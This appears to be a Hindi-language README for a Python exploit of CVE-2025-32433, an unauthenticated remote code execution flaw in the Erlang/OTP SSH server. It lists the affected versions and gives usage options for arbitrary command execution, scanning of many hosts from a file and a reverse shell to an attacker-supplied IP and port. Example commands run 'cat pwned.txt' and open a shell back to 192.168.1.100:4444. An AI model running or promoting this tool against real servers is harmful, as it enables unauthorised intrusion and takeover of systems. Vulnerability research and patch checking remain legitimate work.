
यह कमजोरी एक हमलावर को, जिसके पास Erlang/OTP SSH सर्वर तक नेटवर्क पहुंच है, बिना पूर्व प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देती है।
यह भेद्यता एक हमलावर को, जिसके पास Erlang/OTP SSH सर्वर तक नेटवर्क पहुंच है, बिना किसी प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देती है।
Erlang/OTP SSH सर्वर में एक गंभीर भेद्यता पाई गई है जो एक हमलावर को बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) करने में सक्षम बना सकती है। SSH प्रोटोकॉल संदेश प्रबंधन में एक त्रुटि का शोषण करके, एक दुर्भावनापूर्ण अभिनेता प्रभावित सिस्टमों तक अनधिकृत पहुंच प्राप्त कर सकता है और वैध क्रेडेंशियल्स के बिना मनमाने कमांड निष्पादित कर सकता है। इससे उक्त होस्ट से समझौता हो सकता है, जिससे तीसरे पक्षों द्वारा संवेदनशील डेटा तक अनधिकृत पहुंच और हेरफेर, या सेवा से इनकार (DoS) हमले हो सकते हैं।
OTP-27.3.2 और उससे पहले
OTP-26.2.5.10 और उससे पहले
OTP-25.3.2.19 और उससे पहले
python cve-2025-32433.py <host> [options]
विकल्प:
-p PORT, --port PORT: SSH पोर्ट (डिफ़ॉल्ट: 22)
-t TIMEOUT, --timeout TIMEOUT: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 5)
-c COMMAND, --command COMMAND: निष्पादित करने के लिए कस्टम कमांड
--check: जांचें कि लक्ष्य संवेदनशील है या नहीं
-u urls.txt, --urlfile urls.txt: स्कैन करने के लिए होस्टों की सूची वाली फ़ाइल (एक प्रति पंक्ति)
-o output.txt, --output output.txt: परिणामों को संग्रहीत करने के लिए आउटपुट फ़ाइल।
--shell: रिवर्स शेल लॉन्च करें
--lhost LHOST: रिवर्स शेल के लिए हमलावर का आईपी
--lport LPORT: रिवर्स शेल के लिए हमलावर का पोर्ट (डिफ़ॉल्ट: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444